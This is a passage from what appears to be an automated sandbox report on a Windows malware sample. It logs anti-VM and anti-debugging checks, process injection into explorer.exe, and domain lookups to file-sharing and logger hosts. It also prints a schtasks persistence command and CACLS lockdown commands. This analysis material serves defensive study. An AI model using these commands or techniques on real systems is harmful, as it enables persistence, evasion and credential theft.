                      Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
                      Source: explorer.exe, 00000001.00000000.320883959.0000000007166000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
                      Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&0000001 ZG
                      Source: explorer.exe, 00000001.00000000.268626797.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}i,
                      Source: 2B4A.exe, 0000000C.00000002.553806034.0000000000870000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllJ
                      Source: rovwer.exe, 0000000F.00000002.551885520.0000000000AFF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW8e
                      Source: explorer.exe, 00000001.00000000.316628124.0000000005063000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}9'
                      Source: vbc.exe, 00000021.00000002.540979642.0000000007542000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Ven_NECVMWar&Prod_VMware_SAT
                      Source: explorer.exe, 00000001.00000000.268150231.0000000008FE9000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
                      Source: 816F.exe, 0000001A.00000002.552068120.00000000008B9000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeProcess information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeSystem information queried: ModuleInformation

                      Anti Debugging

                      barindex
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Roaming\tiddsjjSystem information queried: CodeIntegrityInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00930D90 mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_0093092B mov eax, dword ptr fs:[00000030h]
                      Source: C:\Users\user\AppData\Roaming\tiddsjjCode function: 11_2_00B483B3 push dword ptr fs:[00000030h]
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Roaming\tiddsjjProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeProcess queried: DebugPort
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0040ADB0 GetProcessHeap,HeapFree,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_02520490 LdrInitializeThunk,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeMemory allocated: page read and write | page guard
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0040CE09 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_0040E61C _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_00416F6A __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: 12_2_004123F1 SetUnhandledExceptionFilter,

                      HIPS / PFW / Operating System Protection Evasion

                      barindex
                      Source: C:\Windows\explorer.exeDomain query: cdn-102.anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: bitbucket.org
                      Source: C:\Windows\explorer.exeDomain query: bbuseruploads.s3.amazonaws.com
                      Source: C:\Windows\explorer.exeDomain query: u.to
                      Source: C:\Windows\explorer.exeDomain query: github.com
                      Source: C:\Windows\explorer.exeDomain query: raw.githubusercontent.com
                      Source: C:\Windows\explorer.exeDomain query: cdn.discordapp.com
                      Source: C:\Windows\explorer.exeDomain query: o36fafs3sn6xou.com
                      Source: C:\Windows\explorer.exeDomain query: anonfiles.com
                      Source: C:\Windows\explorer.exeDomain query: hoteldostyk.com
                      Source: C:\Windows\explorer.exeDomain query: iplogger.com
                      Source: C:\Windows\explorer.exeNetwork Connect: 89.208.107.216 80
                      Source: C:\Windows\explorer.exeDomain query: srshf.com
                      Source: C:\Windows\explorer.exeDomain query: transfer.sh
                      Source: C:\Windows\explorer.exeDomain query: 1ecosolution.it
                      Source: C:\Windows\explorer.exeNetwork Connect: 193.56.146.168 80
                      Source: C:\Windows\explorer.exeDomain query: cdn-104.anonfiles.com
                      Source: C:\Windows\explorer.exeFile created: 6644.exe.1.drJump to dropped file
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Roaming\tiddsjjSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
                      Source: C:\Users\user\AppData\Roaming\tiddsjjSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 protect: page execute and read and write
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeMemory written: C:\Users\user\AppData\Local\Temp\86EE.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\AppData\Local\Temp\8C00.exeMemory written: C:\Users\user\AppData\Local\Temp\8C00.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\S2XJ2wbz7u.exeThread created: C:\Windows\explorer.exe EIP: 3321A28
                      Source: C:\Users\user\AppData\Roaming\tiddsjjThread created: unknown EIP: 5851A28
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
                      Source: C:\Windows\explorer.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: CDF380
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 700000
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe base: 44B008
                      Source: C:\Windows\explorer.exeMemory written: PID: 5612 base: CDF380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5928 base: 7FF69FF38150 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 1768 base: CDF380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5080 base: 7FF69FF38150 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 3780 base: CDF380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 1648 base: CDF380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 812 base: CDF380 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 6120 base: 7FF69FF38150 value: 90
                      Source: C:\Windows\explorer.exeMemory written: PID: 5508 base: CDF380 value: 90
                      Source: C:\Users\user\AppData\Local\Temp\3790.exeProcess created: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe"
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN rovwer.exe /TR "C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe" /F
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "rovwer.exe" /P "user:N"&&CACLS "rovwer.exe" /P "user:R" /E&&echo Y|CACLS "..\99e342142d" /P "user:N"&&CACLS "..\99e342142d" /P "user:R" /E&&Exit
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\6CEC.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "rovwer.exe" /P "user:R" /E
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /S /D /c" echo Y"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:N"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cacls.exe CACLS "..\99e342142d" /P "user:R" /E
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Users\user\AppData\Local\Temp\8C00.exeProcess created: C:\Users\user\AppData\Local\Temp\8C00.exe C:\Users\user\AppData\Local\Temp\8C00.exe
                      Source: C:\Users\user\AppData\Local\Temp\86EE.exeProcess created: C:\Users\user\AppData\Local\Temp\86EE.exe C:\Users\user\AppData\Local\Temp\86EE.exe
                      Source: C:\Users\user\AppData\Local\Temp\8C00.exeProcess created: unknown unknown
                      Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Program ManagerT7<=ge
                      Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.319633888.0000000006770000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.324125536.00000000090D8000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                      Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                      Source: explorer.exe, 00000001.00000000.307075879.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.286195559.0000000001378000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000001.00000000.257831649.0000000001378000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CProgmanile
                      Source: explorer.exe, 00000001.00000000.308527559.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.286813031.0000000001980000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000001.00000000.258274130.0000000001980000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeCode function: GetLocaleInfoA,
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel\v4.0_4.0.0.0__b77a5c561934e089\System.ServiceModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IdentityModel\v4.0_4.0.0.0__b77a5c561934e089\System.IdentityModel.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\SMDiagnostics\v4.0_4.0.0.0__b77a5c561934e089\SMDiagnostics.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceModel.Internals\v4.0_4.0.0.0__31bf3856ad364e35\System.ServiceModel.Internals.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\2B4A.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Local\Temp\853321935212 VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\99e342142d\rovwer.exeQueries volume information: C:\Users\user\AppData\Roaming\a091ec0a6e2227\cred64.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Users\user\AppData\Local\Temp\816F.exe VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\taile.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformation
                      Source: C:\Users\user\AppData\Local\Temp\816F.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation
